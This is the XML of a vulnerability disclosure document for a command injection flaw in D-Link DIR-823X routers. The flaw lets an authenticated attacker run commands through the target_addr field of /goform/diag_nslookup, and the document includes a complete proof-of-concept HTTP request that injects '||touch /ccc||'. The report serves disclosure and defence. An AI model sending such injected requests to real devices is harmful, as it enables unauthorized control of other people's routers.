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AE655">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="information"/>
      <w:r>
        <w:t>Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D5ACE">
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vendor of the products:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> D-Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478B247">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vendor's website:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.dlink.com.cn/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>http://www.dlink.com.cn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0072E24E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reported by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> He Nan(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"mailto:2777256035@qq.com"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2777256035@qq.com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 , Zhao Jiangting(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"mailto:sta8r9@163.com"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sta8r9@163.com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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2161FA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected products:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DIR-823X AX3000 Series Routers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F74E88">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected firmware version:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 240126, 240802</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096306A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firmware download address:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.dlink.com.cn/home/product?id=3118" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>http://www.dlink.com.cn/home/product?id=3118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="65B94B28">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="overview"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="7A57B7CF">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="vulnerability-details"/>
      <w:r>
        <w:t>A command injection vulnerability in D-Link DIR-823X Series Routers with firmware versions 240126/240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/diag_nslookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> via the corresponding function, triggering remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C087249">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1C85D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>By analyzing the sub_41710C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> function in this binary file, we can see that the value of target_addr is passed to the variable s via the snprintf function, and the variable s is then used as an argument for the system function. Therefore, by maliciously injecting a value into target_addr, remote code execution can be achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A177DA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5479415" cy="28238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FA45CCD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="poc"/>
      <w:r>
        <w:t>This function can be triggered by submitting a POST request to /goform/diag_nslookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6BC613">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Poc</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="77B34AE5">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="attack-demonstration"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST /goform/diag_nslookup HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CD6F43">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host: 192.168.122.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638E1BC1">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B10E0">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73868E7A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6885E7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8B36A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39CF9F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X-Requested-With: XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2303245A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Length: 67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDAD8DC">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Origin: http://192.168.122.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3B1A5">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4E39F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer: http://192.168.122.130/login.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47CBD4">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie: sessionid=00000000000000000000000000000000; token=00000000000000000000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86637A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38366417">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target_addr=||touch%20/ccc||&amp;token=00000000000000000000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA4320">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B90E1">
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="29737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3CA7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HTML Code"/>
    <w:basedOn w:val="19"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="21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1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</Words>
  <Characters>1573</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1721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2025-03-06T15:31:00Z</dcterms:created>
  <dc:creator>嗯</dc:creator>
  <cp:lastModifiedBy>嗯</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-06T16:06:55Z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eyJoZGlkIjoiMzRhZTQyZjI1ODA1OWU1ZjM1OTI0OTA0MTkyMTBiYjciLCJ1c2VySWQiOiI3MjY4NTAxODEifQ==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FCD8DCDF78EC415CA39352CE1ED3E0A2_12</vt:lpwstr>
  </property>
</Properties>
</file>